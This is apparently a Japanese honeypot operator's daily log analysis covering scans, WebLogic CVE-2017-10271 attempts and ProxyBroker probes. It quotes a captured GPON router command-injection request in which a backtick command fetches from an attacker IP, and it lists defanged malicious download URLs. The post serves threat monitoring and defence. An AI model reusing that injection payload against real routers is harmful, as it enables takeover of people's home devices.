WOWhoneypotの2018/6/9(土)（運用6日目）の簡易分析です。

総アクセス数は168件でした。

うちこれまでにも来ていたものは、以下です。

• トップページへのアクセス：42件
• PhpMyAdminに関する調査行為：121件
• Welogicの脆弱性(CVE-2017-10271)を狙った攻撃：2件

Weblogicのものは、取得先URｌがそれぞれ異なり、以下でした。

120.25.148[.]202/test/DL.php
101.200.45[.]78/test/DL.php 

 新たに見たものを以下、見ていきます。

GET hxxp://db.speedup[.]gdn/echo.php
User-Agent: PxBroker/0.3.1/3923

特徴的なUser-Agentのため、そこで調査したところ以下のGithubが見つかりました。

https://github.com/constverum/ProxyBroke

 どうやら、公開プロキシを探すオープンソースのツールのようです。これによるスキャン行為かと思われます。

パスに入る部分に書かれていたURLを調査しましたが、恐らくは見つかった場合にログとして残すためのコールバック先と思われます。

https://www.hybrid-analysis.com/sample/285b8c5726429d23b7c3344036243e1dbbf02a8c608baf731978c220d51f9a05/5b12667c7ca3e1074b33f394

次。以前にも見かけたものです。

GET hxxp://clientapi.iip[.]net/echo.php 

こちらは特徴的なものは特に見つけられませんでした。通信先はHAで調べてみました。

https://www.hybrid-analysis.com/sample/f96b093c0c48d285937425e5b7b9f4ab6ff114f7a82dbfb905ba8e35d6800627?environmentId=100

確証はありませんが、ひとつ前のものと同じかもしれません。

次。これは特徴がわかりやすいものでした。

GET /GponFrom/diag_Form?images/
XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox wet -q0 hxxp://128.199.251[.]119/gpon.php?port=80`

 家庭用GPONルータの任意のコード実行の脆弱性を狙ったものと思われます。

家庭用 GPON ルータの脆弱性を狙う「Mirai」の亜種、メキシコ発のネットワークスキャン活動で確認 | トレンドマイクロ セキュリティブログ

blog.n-etupirka.net

こちらのハニーポッターの方と同様のログを確認しています。

取得しにいくファイルですが、これも他と同様アクセスログを取得しているだけと推測しています。アクセスログがあった場合には、個別で攻撃を行うものと思われます。

https://www.hybrid-analysis.com/sample/e1407cf357ae5dfe26c61a3cffeaefbe08dbee36fe2afb52dbcf55fa4635413f/5b1caa807ca3e11bcc55caf3

ハンティングログに残っていたものは、GPONのもののみでした。

前日まで来ていたものは来ていなかったです。